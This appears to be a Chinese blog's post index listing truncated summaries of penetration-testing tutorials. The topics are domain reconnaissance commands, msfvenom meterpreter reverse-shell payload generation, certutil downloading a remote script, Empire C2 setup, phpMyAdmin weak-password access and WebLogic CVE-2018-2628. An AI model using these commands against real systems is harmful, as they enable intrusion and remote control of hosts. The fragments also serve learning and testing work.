摘要:信息收集 query user || qwinsta 查看当前在线用户 net user 查看本机用户 net user /domain 查看域用户 net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多 net view 阅读全文
posted @ 2020-05-26 14:38 _H0f 阅读(69) 评论(0) 推荐(0) 编辑
摘要:windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击IP LPORT=攻击端口 -a x86 --platform Windows -f exe > okc.exe msfvenom -p windows/x64/meterpre 阅读全文
posted @ 2020-03-06 15:36 _H0f 阅读(158) 评论(0) 推荐(0) 编辑
摘要:Windows命令行读取写删下载文件命令 读取文件 type qq.txt 下载远端文件 certutil -urlcache -split -f http://XXXXX/test.bat 查找文件 for /r D:\ %i in (*2020*) do @echo %i #在D盘查找命名中带有 阅读全文
posted @ 2020-02-20 22:36 _H0f 阅读(83) 评论(0) 推荐(0) 编辑
摘要:转发:https://blog.csdn.net/u014199860/article/details/80415519 Windows下端口转发,以实现远程端口3389为例场景如下先说明一下场景,服务器A处于局域网环境内,IP为192.168.1.200(同时作为虚拟机B的网关192.168.13 阅读全文
posted @ 2020-02-15 23:48 _H0f 阅读(77) 评论(0) 推荐(0) 编辑
摘要:pip install dropbox2 或者: wgte https://files.pythonhosted.org/packages/88/c9/899c5d112eb4aa48fb611153c2f2eadafd859cbdee637b376d140a60e50d/dropbox-9.4.0 阅读全文
posted @ 2019-11-21 22:26 _H0f 阅读(63) 评论(0) 推荐(0) 编辑
摘要:安装使用: Empire运行在linux平台上,使用的系统是Centos,首先使用git命令把程序目录下载下来,如下图所示。 git clone https://github.com/EmpireProject/Empire.git 接着进入setup目录,安装empire,命令如下: cd Emp 阅读全文
posted @ 2019-11-20 13:33 _H0f 阅读(897) 评论(0) 推荐(0) 编辑
摘要:首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了 尝试使用Navicate进行数据库连接返回禁止远程连接数据库: 但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接: Navicat安装目录下上传ntunnel_mysql.p 阅读全文
posted @ 2019-06-07 00:37 _H0f 阅读(649) 评论(0) 推荐(0) 编辑
摘要:漏洞简介 2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞的 WebLogic 组件进行远程攻击,并 阅读全文
posted @ 2019-04-25 17:26 _H0f 阅读(1730) 评论(0) 推荐(0) 编辑
摘要:转载:https://blog.csdn.net/weixin_42127015/article/details/84472777 关于google hack的几个基础过滤器使用[请务必谨记,过滤器虽然是死的,但人是活的,把自己的脑洞放到最大,才能拼装出高质量dorks]: google所支持的一些 阅读全文
posted @ 2019-04-24 16:04 _H0f 阅读(1272) 评论(0) 推荐(0) 编辑
摘要:D-Link DIR-645 getcfg.php 文件由于过滤不严格导致信息泄露漏洞。 $SERVICE_COUNT = cut_count($_POST["SERVICES"], ","); TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service( 阅读全文
posted @ 2019-03-20 14:52 _H0f 阅读(82) 评论(0) 推荐(0) 编辑